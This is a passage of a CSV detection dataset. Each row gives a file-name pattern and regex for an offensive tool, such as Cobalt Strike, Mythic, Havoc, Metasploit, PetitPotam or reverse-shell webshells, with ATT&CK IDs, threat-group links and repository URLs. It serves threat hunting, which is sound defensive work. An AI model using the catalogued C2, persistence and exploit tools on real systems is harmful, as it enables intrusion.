Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/payload.exe*",".{0,1000}\/payload\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/payload_placement.exe*",".{0,1000}\/payload_placement\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/payload_scripts*",".{0,1000}\/payload_scripts.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/payload_scripts/artifact*",".{0,1000}\/payload_scripts\/artifact.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/payload_service.sh*",".{0,1000}\/payload_service\.sh.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Payload_Type/athena*",".{0,1000}\/Payload_Type\/athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Payload_Types/*",".{0,1000}\/Payload_Types\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/payload2.ps1*",".{0,1000}\/payload2\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*/payloads/DllLdr/*",".{0,1000}\/payloads\/DllLdr\/.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/payloads/payloads.go*",".{0,1000}\/payloads\/payloads\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6497","579","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z" "*/payloads/util*",".{0,1000}\/payloads\/util.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/payloadtests.py*",".{0,1000}\/payloadtests\.py.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "*/pcanywhere-brute.nse*",".{0,1000}\/pcanywhere\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pcworx-info.nse*",".{0,1000}\/pcworx\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/PDF_Payload/script.txt*",".{0,1000}\/PDF_Payload\/script\.txt.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*/pdf2john.py*",".{0,1000}\/pdf2john\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/pe/dll*",".{0,1000}\/pe\/dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/PE/InjectPE.cs*",".{0,1000}\/PE\/InjectPE\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/pe_to_shellcode*",".{0,1000}\/pe_to_shellcode.{0,1000}","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2203","411","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" "*/pe2shc.exe*",".{0,1000}\/pe2shc\.exe.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*/pe2shc/*",".{0,1000}\/pe2shc\/.{0,1000}","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2203","411","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" "*/PEASS-ng.git*",".{0,1000}\/PEASS\-ng\.git.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*/PEASS-ng/*",".{0,1000}\/PEASS\-ng\/.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*/PeerToPeerService.*",".{0,1000}\/PeerToPeerService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/peinjector*",".{0,1000}\/peinjector.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/peinjector.*",".{0,1000}\/peinjector\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/pendulum.git*",".{0,1000}\/pendulum\.git.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","N/A","9","1","85","10","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z" "*/pentest*",".{0,1000}\/pentest.{0,1000}","offensive_tool_keyword","_","pentest keyword detection. 
detect potential pentesters using this keyword in file name. repository or command line","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/PE-Obfuscator*",".{0,1000}\/PE\-Obfuscator.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","3","203","37","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*/perf_swevent64*",".{0,1000}\/perf_swevent64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/Perfusion.exe*",".{0,1000}\/Perfusion\.exe.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*/Perfusion.git*",".{0,1000}\/Perfusion\.git.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*/PerfusionDll.dll*",".{0,1000}\/PerfusionDll\.dll.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/Perfusion","1","1","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*/perl-reverse-shell.pl*",".{0,1000}\/perl\-reverse\-shell\.pl.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","N/A","10","1","48","11","2024-03-02T05:51:24Z","2024-02-28T15:12:42Z" "*/persist.tpl*",".{0,1000}\/persist\.tpl.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*/persist_cortana.py*",".{0,1000}\/persist_cortana\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*/persist_people.py*",".{0,1000}\/persist_people\.py.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*/PersistBOF/*",".{0,1000}\/PersistBOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","247","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" "*/Persistence.cpp*",".{0,1000}\/Persistence\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*/Persistence.sh*",".{0,1000}\/Persistence\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "*/persistence/*.ps1",".{0,1000}\/persistence\/.{0,1000}\.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1133","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/persistence/*.psm1",".{0,1000}\/persistence\/.{0,1000}\.psm1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1134","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/Persistence/InstallUtil.*",".{0,1000}\/Persistence\/InstallUtil\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*/persistence_demos.git*",".{0,1000}\/persistence_demos\.git.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 
","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","1","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*/persistence2.rc*",".{0,1000}\/persistence2\.rc.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/Persistence-Accessibility-Features.git*",".{0,1000}\/Persistence\-Accessibility\-Features\.git.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*/persit_linux.go*",".{0,1000}\/persit_linux\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*/persit_windows.go*",".{0,1000}\/persit_windows\.go.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*/peterspbr/dirty-pipe-otw*",".{0,1000}\/peterspbr\/dirty\-pipe\-otw.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation 
tools","https://github.com/peterspbr/dirty-pipe-otw","1","1","N/A","N/A","1","1","0","2022-03-10T03:42:15Z","2022-03-09T17:21:17Z" "*/PetitPotam.git*",".{0,1000}\/PetitPotam\.git.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*/petitpotam.py*",".{0,1000}\/petitpotam\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/PetitPotato.cpp*",".{0,1000}\/PetitPotato\.cpp.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","1","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" 